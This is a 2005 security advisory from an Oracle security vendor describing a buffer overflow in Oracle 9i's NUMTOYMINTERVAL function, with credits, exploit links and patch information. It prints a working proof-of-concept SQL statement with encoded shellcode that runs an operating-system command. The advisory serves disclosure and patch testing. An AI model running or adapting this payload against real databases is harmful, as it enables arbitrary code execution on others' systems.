Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)
Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
|
Buffer Overflow in NUMTOYMINTERVAL in Oracle 9i
Name |
Buffer Overflow Oracle NUMTOYMINTERVAL in Oracle 9i (up to 9.2.0.3) |
Systems Affected |
Oracle 9i |
Severity |
High Risk |
Category |
Buffer Overflow |
Vendor URL |
http://www.oracle.com/ |
Credit |
Cesar Cerrudo (<argeniss>dot<com) / Mark Litchfield (<mark at ngssoftware.com>) |
Exploit |
http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016789.html |
Exploit |
http://www.ngssoftware.com/advisories/ora_numtoyminterval.txt |
Date |
14 May 2005 (V 1.00) |
Details
Buffer Overflow in NUMTOYMINTERVAL. Every database user can exploit this vulnerability and execute arbitrary code. This vulnerability can be exploited via SQL Injection
Example
SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||
chr(52) ||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)
||'echo ARE YOU SURE? >c:\Unbreakable.txt')
FROM DUAL;
Patch Information
Apply Oracle patchset 9.2.0.4 or late
© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
|
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.
|